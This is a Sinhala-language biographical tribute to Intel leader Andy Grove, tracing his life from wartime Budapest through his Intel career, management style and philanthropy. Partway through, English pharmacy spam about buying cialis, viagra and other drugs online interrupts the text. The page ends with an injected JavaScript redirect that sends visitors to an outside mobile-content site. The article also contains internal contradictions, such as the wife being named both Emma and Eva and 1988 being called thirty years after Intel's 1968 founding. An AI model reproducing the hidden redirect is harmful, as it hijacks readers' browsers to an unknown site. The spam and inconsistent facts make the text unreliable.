අනාගතය දුටු තාක්‍ෂණඥයා ඇන්ඞ් ගෲව් (1936-2016)

 

පන්නරය

දැවැන්ත ගෝලීය ව්‍යවසායකයන් බිහිකිරීමේලා අතිවිශේෂ හැකි යාවක් ඇමරිකාව සතුව තිබෙන වග, හාවර්ඞ් ව්‍යාපාර පාසලෙහි මහාචාර්ය රිචඞ් ටැඞ්ලෝ 2001දී ඔහු පළ කළ Giants of Enterprise නම් ග‍්‍රන්ථයෙහි සඳහන් කොට තිබේ. ඔහුට අනුව, ඉතාලිය ශ්‍රේෂ්ඨ ඔපෙරා නිර්මාණකරුවන් විශාල සංඛ්‍යාවක් ගෝලීය සංගීත ක්ෂේත‍්‍රයට දායාද කරන විට රුසියාව ඉහළ මට්ටමේ නවකතාකරුවන් රැුසක් ලොවට හඳුන්වා දෙයි. එහෙත් ශූර ව්‍යාපාරිකයන් තොග ගණනින් නිපදවන්නේ ඇමරිකාවයි.

පරිගණක යුගයේ පියා

ඇමරිකාවේ වානේ නිපැයුම් යුගයේ පෙරගමන්කරුවා වූයේ ඇන්ඩෲ කානගීය. ඉනික්බිති එරට ඛනිජ තෙල් නිෂ්පාදනයේ හා වෙළඳාමේ ස්වර්ණමය යුගයට මඟ පාදා දුන්නේ ජෝන් ඞී රොකෆෙලර්ය. 2016 මාර්තු 21 දින මෙලොව හැරගිය විශිෂ්ට තාක්ෂණඥයා ඇන්ඩි ගෲව්, එරට පරිගණක යුගයේ පියා ලෙස හැඳින්විය හැකිය. 1936 සැප්තැම්බර් 2 දින, හංගේරියාවේ බුඩාපෙස්ට් නගරයෙහි ඉපැදුණු ඇන්ඩි ගෲව්ට යාන්තම් වයස අවුරුදු 8 සපිරෙන මොහොතේ හිට්ලර්ගේ නාසි හමුදාවෝ හංගේරියාව ආක‍්‍රමණය කළහ. නාසි මෙහෙයුමේ අණදෙන නිලධාරියා වූ රුඩොල්ෆ් හෙස්, හංගේරියානු යුදෙව්වන් ලක්ෂ 5ක් පමණ අත්අඩංගුවට ගෙන ඔවුන් වදකඳවුරු තුළ ගාල්කළේය. මාස 3ක් වැනි කෙටි කාලයක් ඇතුළත ලක්ෂ 4ක් පමණ මරා දැමීමට හෙතෙම ක‍්‍රියා කළේය. යුදෙව්වන් වූ ඇන්ඞ් ගෲව් නාසීන්ගේ අත්අඩංගුවට පත්විය. එහෙත් වාසනාවකට මෙන්, මරණයෙන් බේරී යුද්ධය අවසානයේදී තම පවුල් කුටුම්බයට එක්වීමේ හැකියාව ජෝර්ජ් ගෲව්ට උදාවිය. රුසියානු රතු හමුදාව, නාසීන් හංගේරියාවෙන් පළවා හැර ඒකාධිපති කොමියුනිස්ට් ආණ්ඩුවක් එරට පිහිටුවීය. එම කොමියුනිස්ට් රෙජීමයේ දරදඬු පාලනයට එරෙහිව නැඟුණු 1956 තරුණ කැරැුල්ල, අනුකම්පා විරහිතව මර්දනය කෙරුණු අතර, වදහිංසාවට ලක්වේයැයි බියෙන් හංගේරියානුවෝ ලක්ෂ 2ක් පමණ බටහිර යුරෝපය බලා පැන ගියහ. එවකට විසි හැවිරිදි තරුණයෙකු වූ ඇන්ඩි ද ඕස්ටි‍්‍රයාවට පලා ගියේය. 1957දී හෙතෙම ඇමරිකාවට පැමිණියේ ඉංග‍්‍රීසි අකුරක්වක් නොදත්, අතේ සතේ නැති අනාථයකු ලෙසය. කතාබහ කරගත හැකි තත්ත්වයට ඉංග‍්‍රීසි උගත් පසු, ඇන්ඩිට බස් කොන්දොස්තර රැුකියාවක් ලැබුණි. ලාබෙට ආහාරපාන ගත හැකි නිව්යෝර්ක්හි හෝටලයක් සොයාගත් ඔහුට, එහි වේටර්වරියක වූ එමා කස්තාන් හිතට ඇල්ලූවේ ඇයද යුදෙව් සරණාගතයකු ලෙස ඇමරිකාව බලා පැමිණි යෞවනියක වු හෙයිනි. 1958දී ඇන්ඩි, එවා සමග විවාහ වුණු අතර 2016දී මියයන තුරුම ඇය හා සතුටින් යුගදිවිය ගත කළේය. කොන්දොස්තර රැුකියාවෙන් ඉපැයූ මුදල් ඉතිරි කරගත් ඇන්ඩි ගෲව්, නිව්යෝර්ක්හි ‘සිටි කොලීජියේ’ රසායන විද්‍යා පදනම් පාඨමාලාවට ඇතුල් වූයේ රාත‍්‍රී ශිෂ්‍යයකු ලෙසය. 1960දී රසායන ඉංජිනේරු විද්‍යාව පිළිබඳ උපාධිය සිටි කොලීජියෙන් දිනාගත් හෙතම එම විෂය හා අදාළ ආචාර්ය උපාධිය 1963දී කැලිෆෝනියා සරසවියෙන් ලබාගැනීමට සමත් විය. ආචාර්ය උපාධිය දිනාගැනීමත් සමග කොන්දොස්තර රැුකියාවට ආයුබෝවන් කී ඔහු අර්ධ සන්නායක නිපදවන ෆෙයාචයිල්ඞ් සමාගමට පර්යේෂකයකු ලෙස 1963 අවසානයේදී එක්විය. 1967 වනවිට ඔහු එම ආයතනයේ පර්යේෂණ සංවර්ධනය පිළිබඳ සහකාර අධ්‍යක්ෂ තනතුරට පත්විය.

ඉන්ටෙල්හි ඇරඹුම

විද්‍යුත් පරිපථ සංකලනය සම්බන්ධයෙන් ඇන්ඩි ගෲව් සිදුකළ පර්යේෂණ 1970දී පැනනැඟුණු ක්ෂුද්‍ර පරිගණක නිපැයුම් විප්ලවයට ඍජුවම දායක වූ බව සියලූ පරිගණක විද්‍යාඥයෝ අවිවාදයෙන් පිළිගනිති. ‘අර්ධ සන්නායක මෙවලම් හා අදාළ භෞතික විද්‍යා තාක්ෂණය’ නමින් ඇන්ඩි 1967දී පළ කළ ග‍්‍රන්ථය, ඇමරිකාවේ සියලූ සරසවි විසින් පරිහරණය කළ යුතු පාඨ ග‍්‍රන්ථයක් ලෙස නම් කෙරිණි. ඇන්ඩි සමග ෆෙයාචයිල්ඞ් සමාගමේ සේවය කළ රසායන විද්‍යාඥයෙකු වූ ගෝඞ්න් ඊ මුවර් සහ භෞතික විද්‍යාඥයකු වූ රොබට් නොයිස්, 1968දී එතැනින් ඉවත් වී ඉන්ටෙල් නමැති අර්ධ සන්නායක නිපැයුම් සමාගම ස්ථාපිත කළහ. ඉන්ටෙල්හි පළමු වැනි සේවකයා ලෙස ඊට එක්වුණු ඇන්ඩි ගෲව්ට, එහි ‘ඉංජිනේරු අධ්‍යක්ෂ’ තනතුර හිමිවුණි. පරිගණක ස්මෘති චිප් නිපදවීම ආරම්භයේදී සිදුකළත් 1985 පමණ වනවිට ‘ක්ෂුද්‍ර සකසන’ නිෂ්පාදනයට වැඩි අවධානයක් යොමු කිරීමට ඉන්ටෙල් සමාගම ක‍්‍රියා කළේය. අයි.බී.එම්. සමාගම සිය නවීන පුද්ගලික පරිගණක සඳහා තනිකරම යොදාගත්තේ ඉන්ටෙල් විසින් නිෂ්පාදිත ක්‍ෂුද්‍ර සකසනයි. ඉන්ටෙල් ස්ථාපිත කැරුණායින් පසු මුල් වසර අවසානයේ ඉපැයූ සමස්ත ආදායම ඇමරිකන් ඩොලර් 2672කි. වසර 30ක් ගතවුණු පසු, එනම් 1988දී එය ඇ.ඩො. බිලියන 20.8 දක්වා ඉහළ නැංවුණේ ඇන්ඩි ගෲව්ගේ විශිෂ්ට මාර්ගෝපදේශකත්වය යටතේය. 1979දී ඉන්ටෙල්හි සභාපති පදවියටත්, 1987දී සමාගමේ ප‍්‍රධාන විධායක නිලධාරී තනතුරටත් පත්වුණු ඇන්ඩි, 1997දී මෙකී තනතුරු දෙකම හෙබවීය. සිය පුරස්ථ ග‍්‍රන්ථියේ පිළිකාවක් හටගෙන ඇතැයි දැනගත් සැණින් ඉන්ටෙල් ප‍්‍රධාන විධායක නිලධාරි තනතුරෙන් ඉල්ලා අස්වුණු නමුත් 2004 නොවැම්බර් මාසය වෙනතුරුම හෙතෙම එහි සභාපති ධුරය දැරීය. 2004න් පසු ඔහු ඉන්ටෙල්හි ජ්‍යෙෂ්ඨ උපදේශකවරයකු ලෙස කටයුතු කළේය. ඉන්ටෙල්හි වෙළඳපොළ ප‍්‍රාග්ධනීකරණය ඇ.ඩො. බිලියන 4 සිට බිලියන 197 දක්වා 4500%කින් ඉහළ ගොස්, සේවකයන් 64,000කින් යුත් ලොව 7 වැනි විශාලතම සමාගම බවට එය පත්වූයේ ඇන්ඩි ගෲව් එහි ප‍්‍රධාන විධායක නිලධාරී ලෙස කටයුතු කළ වකවානුවේදීය. 2004දී ඉන්ටෙල් සභාපති ධුරයෙන් සමුගත් පසු ඇමරිකාවේ ස්ටෑන්ෆෝඞ් සරසවිය ඇන්ඩි ව්‍යාපාර කළමනාකරණය පිළිබඳ ජ්‍යෙෂ්ඨ කථිකාචාර්යවරයකු ලෙස බඳවාගත්තේ ඔහුගේ ප‍්‍රායෝගික අත්දැකීම් ශිෂ්‍ය ශිෂ්‍යාවන් වෙත බෙදාදීමේ අරමුණ ඇතිවය.

ව්‍යාපාරික දර්ශනය

buy disulfiram 500 online from canada discount prices – low price …
sorbitrate achat en ligne. buying cialis online safe visit this link brand name of lexapro anchor danger of generic viagra. product name: isordil-sublingual.

1983 වසරේදී ඇන්ඩි විසින් ලියා පළ කළ ‘අධිනිමැවුම් කළමනා කරණය’ නම් ග‍්‍රන්ථය විද්වතුන් අතර මහත් සේ ජනප‍්‍රිය වූ පොතක් සේ හැඳින්විය හැකිය. විවිධ මාදිලියේ පරිගණක සඳහා දෘඪාංග හා මෘදුකාංග නිපදවමින් 2015 වසර අවසානය වනවිට ඉන්ටෙල් සමාගම සිය වාර්ෂික ආදායම ඇ.ඩො. බිලියන 55.4 දක්වා ඉහළ නංවාගත්තේය. 2015දී එහි සේවක සංඛ්‍යාව 102,000ක් පමණ විය. තිදෙනෙකුගේ මූලිකත්වයෙන් ඇරඹුණු කුඩා ව්‍යාපාරික ආයතනයක්, දැවැන්ත ගෝලීය සමාගමක් ලෙස කිරුළු පැළඳුවේ ඇන්ඩි ගෲව් බිහිකළ අමුතුම ආයතනික සංස්කෘතිය, ඉන්ටෙල්හි හැම සේවකයකුම නොපැකිලව වැළඳගත් හෙයිනි. ඉන්ටලේහි ප‍්‍රධානම නිපැයුම වු ප‍්‍රවේගික ස්මෘති චිප්ස් හෙවත් DRAMs (Dynamic Memory Chips) වෙත 1985දී මහත් තර්ජනයක් එල්ලවූයේ ජපනුන් කුණු කොල්ලයට මෙමරි චිප්ස් වෙළඳපොළට තොග ගණනින් නිකුත් කළ නිසාය.

එහෙත් මෙම ජපන් අභියෝගය හමුවේ නොසැලූණු ඇන්ඩි ගෲව්, DRAMs නිපැයුම සම්පූර්ණයෙන්ම නවතා දමා ‘ක්ෂුද්‍ර සකසන’ නිෂ්පාදන වෙත දැඩි අදිටනින් යුතුව යොමු විය. එම ව්‍යාපාර ක්ෂේත‍්‍රය (DRAMs) ඉන්ටෙල් අත්හැර දැමීම හේතුවෙන් සමාගම හා තරගයට පැමිණි ජපනුන්ට යනඑන මං නැති විය. ව්‍යාපාර ජයග‍්‍රහණ තුළම ඒවා විනාශ කළ හැකි බීජ සැඟවී ඇති හෙයින් ජයපැන් බීම වෙනුවට තව තවත් මහන්සි වී වැඩ කළ යුතුයැයි ඇන්ඩි සිය සහෘද සේවකයන්ට නිතර අවධාරණය කළේය. හැම සේවකයකුගේම අදහස් සමාගමේ උන්නතියට වැදගත් බැව් හෙතෙම දැඩිව විශ්වාස කළේය. යම් ව්‍යාපාර තීරණයක් හෝ කළමනාකරණ පිළිවෙතක් වැරදි යැයි හැඟුණු විටෙක කම්කරුවෙකුට වුව ඒ ගැන ප‍්‍රධාන විධායක නිලධාරී, සභාපති හමුවී වාදවිවාද කිරීමේ අවස්ථාව ඉන්ටෙල් ආයතනික සංස්කෘතිය තුළ පැලපදියම් වී තිබෙන්නේ මේ නිසාය.

අල්පේච්ඡ බව

ඇන්ඩි ගෲව් සොයා ඉන්ටෙල් මූලස්ථානය වෙත පැමිණෙන වෙනත් ඇමරිකානු හා යුරෝපා සමාගම් සභාපතිවරුන්, ඔහුගේ 8×9 කුඩා කාර්යාල කාමරය දැක පුදුමයට පත්වීම නොවැළැක්විය හැකි විය. මහෝගනී ලී පැනල්වලින් හා දැවැන්ත පුටු සැටිවලින් අලංකෘත විශාල කාර්යාලයක් වෙනුවට සාමාන්‍ය විධායක නිලධාරීන් භාවිත කරන වීදුරු කාමරයක් ඇන්ඩි විසින් තෝරාගත්තේ ඕනෑම කෙනෙකුට ඔහු හමුවීමේ පහසුකම සලසාදීම උදෙසාය. සේවකයන් අතර හිඳිමින් වැඩ කිරීම ප‍්‍රිය කළ ඇන්ඩි ගෲව්, තම වාහනය ගාල් කළේද පොදු රථ ගාල තුළය. ඇමරිකාවේ අනෙක් සමාගම් සභාපතිවරුන් මෙන් පුද්ගලික ගුවන් යානයක් භාවිත නොකරන්නේ මන්දැයි වරෙක මාධ්‍යවේදියෙකු ඇන්ඩිගෙන් විමසා සිටියේය. බස් කොන්දොස්තරවරයකු ලෙස ජීවිකාව ආරම්භ කළ තමන්ට එවැනි සුඛවිහරණ අවශ්‍ය නොවන වග ඔහු සිනාමුසු මුහුණින් පැවසීය. හැම වැඩක්ම තිතට හා නූලට ඉෂ්ටසිද්ධ කළ ඔහු එම විනය හා කැපවීම අනෙක් සේවකයන්ගෙන්ද ඉටුවෙනු ඇතැයි අපේක්ෂා කළේය. බොරුකාරයන් අනුකම්පා විරහිතව සේවයෙන් නෙරපා හරින ලද අතර වැඩකාරයන්ට සමාගමේ කොටස් බෙදාදීමට හෙතෙම පියවර ගත්තේය. මෙම කොටස් හිමිකම හරහා ඉන්ටෙල් සේවකයෝ් බොහොමයක් මිලියනපතියන් බවට පත්වූහ. ප‍්‍රියසාද පැවැත්වීම, සෝබන මාධ්‍ය හමුවලට සහභාගි වීම පිළිකෙව් කළ ඇන්ඩි තමා කෝටිපතියකු ලෙස අධ්‍යාපනය ලැබූ නිව්යෝර්ක් සිටි කොලීජියට 2006දී සිය පෞද්ගලික ධනයෙන් ඇමරිකන් ඩොලර් මිලියන 26ක් පිරිනැමීය. සහනදායී ගාස්තුවලට යටත්ව ඉංජිනේරු පාඨමාලා හැදෑරිය හැකි ‘ගෲව් ඉංජිනේරු පීඨය’ එහි ස්ථාපිත කෙරුණේ මෙකී පරිත්‍යාග මුදල් උපයෝගී කොටගෙනය. හංගේරියානු රතු සහෝදරවරුන්ගේ කොමියුනිස්ට් යකඩ සපත්තුවෙන් බේරී සරණාගතයකු ලෙස ඇමරිකාවට පැමිණි ඇන්ඩි ගෲව්ට ඇමරිකානු ප‍්‍රජාතන්ත‍්‍රවාදය යටතේ අතිවිශිෂ්ට අධ්‍යාපනයක් ලැබීමේ මහඟු අවස්ථාවද, බස් කොන්දොස්තරවරයකු ලෙස හෝ ඉගෙනීමට අවශ්‍ය මුදල් සොයාගැනීමේ අවස්ථාවද එක්සත් ජනපදය විසින් තිළිණ කළේය. ඊට ප‍්‍රතිඋපකාරයක් ලෙස අර්ධ සන්නායක නිපැයුම් ක්ෂේත‍්‍රයේ විප්ලවයක් සිදු කරමින්, නව තාක්ෂණයේ පෙරගමන්කරු වීමට ඇමරිකාවට ඉඩ සලසා දුන්නේ ඇන්ඩි ගෲව්ය. ඉන්ටෙල් ආයතනය තුළ, සිලිකොන් වැලි පුරවරය තුළ මෙන්ම සමස්ත තොරතුරු තාක්ෂණ ක්ෂේත‍්‍රය තුළ යහපත් හා විප්ලවකාරී වෙනස්වීම් සමුදායක් සිදුකළ මේ ශ්‍රේෂ්ඨ මිනිසා 2016 මාර්තු 21දා මෙලොවින් සමුගත්තේ ලෝකයට තම යුතුකම් ඉටුකළ සැබෑ විද්වතකු ලෙසය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;